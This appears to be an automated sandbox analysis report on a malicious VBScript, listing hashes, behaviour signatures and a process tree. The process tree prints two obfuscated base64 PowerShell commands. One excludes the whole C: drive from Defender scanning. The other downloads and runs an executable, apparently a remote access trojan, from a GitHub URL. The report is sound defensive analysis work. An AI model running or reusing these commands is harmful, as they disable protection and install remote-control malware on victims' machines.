Analysis
-
max time kernel
117s -
max time network
118s -
platform
windows7_x64 -
resource
win7-20240419-en -
resource tags
-
submitted
04-06-2024 09:22
General
-
Target
d223100bff707f45e8e2d609e64cb84c936ad09b097357dfc0d68cccfe97ed3e.vbs
-
Size
289KB
-
MD5
ac7f96ac94ca748354e7db225aa1a5b2
-
SHA1
98be163399271b71337afbc716b6a313ea1941e6
-
SHA256
d223100bff707f45e8e2d609e64cb84c936ad09b097357dfc0d68cccfe97ed3e
-
SHA512
862f9d5bc0d4ba27cfa7d75b4974e4eb37d30f53de883419c3e1e7c62fb525a2964e8431b5b5c91e1d2654db5446bba60320d196b148b35480eec2ed2cc26692
-
SSDEEP
6144:Xm/uolvrxUXllOuQcTN5eZ2cH5d/ozSxCP27kbn8buCW+ZFU/Chpav1GUTs8quIr:W2svrwmuQ2yp5keCPtb8b1HZSCSDs8q/
Malware Config
Signatures
-
Command and Scripting Interpreter: PowerShell 1 TTPs 2 IoCs
Using powershell.exe command.
-
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).
-
Suspicious behavior: EnumeratesProcesses 2 IoCs
-
Suspicious use of AdjustPrivilegeToken 2 IoCs
-
Suspicious use of WriteProcessMemory 9 IoCs
Processes
-
C:\Windows\System32\WScript.exe"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\d223100bff707f45e8e2d609e64cb84c936ad09b097357dfc0d68cccfe97ed3e.vbs"1⤵
- Suspicious use of WriteProcessMemory
-
C:\Windows\System32\WScript.exe"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\d223100bff707f45e8e2d609e64cb84c936ad09b097357dfc0d68cccfe97ed3e.vbs" /elevate2⤵
- Suspicious use of WriteProcessMemory
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" $TNuiO = [System.Text.Encoding]::Unicode.GetString([System.Convert]::FromBase64String('QQBkAGQALQBNAHAAUAByAGUAZgBlAHIAZQBuAGMAZQAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgACcAQwA6AFwAJwA=')); Invoke-Expression -Command $TNuiO3⤵
- Command and Scripting Interpreter: PowerShell
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" $unLyJ = [System.Text.Encoding]::Unicode.GetString([System.Convert]::FromBase64String('aQB3AHIAIAAtAFUAcgBpACAAaAB0AHQAcABzADoALwAvAGcAaQB0AGgAdQBiAC4AYwBvAG0ALwBkAGUAdgBjAHIAaQBpAGkALwBSAEEAVABUAC8AcgBhAHcALwBtAGEAaQBuAC8AYgB1AGkAbAB0AC4AZQB4AGUAIAAtAE8AdQB0AEYAaQBsAGUAIAAkAGUAbgB2ADoAVABFAE0AUABcAHgAbABlAFUAaABaAEQATABRAEcAUABNAHMAaABlAGQAUABhAHQAWABxAFoALgBlAHgAZQA7AFMAdABhAHIAdAAtAFAAcgBvAGMAZQBzAHMAIAAkAGUAbgB2ADoAVABFAE0AUABcAHgAbABlAFUAaABaAEQATABRAEcAUABNAHMAaABlAGQAUABhAHQAWABxAFoALgBlAHgAZQA=')); Invoke-Expression -Command $unLyJ3⤵
- Command and Scripting Interpreter: PowerShell
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
-
-
Network
MITRE ATT&CK Enterprise v15
Replay Monitor
Loading Replay Monitor...
Downloads
-
Filesize
7KB
MD58b3ccc503fda9da5c16fc8a7fb945c69
SHA1bf141c3b691817e039f76366cb39ec7607172c77
SHA256bfb985427914d4565fc242dc707e64a16d6716719ce390ad5dd392af9ae3efdc
SHA512f21575e7c4fc6a4942d934f3e25f011b3415c2d396a93af26f3d8f23174c511d1d77e861b2e53eef848a88d007026a208fd2dc80a07e55952cc847af231aaf26
-
Filesize
2.9MB
-
Filesize
32KB
-
Filesize
2.9MB
-
Filesize
32KB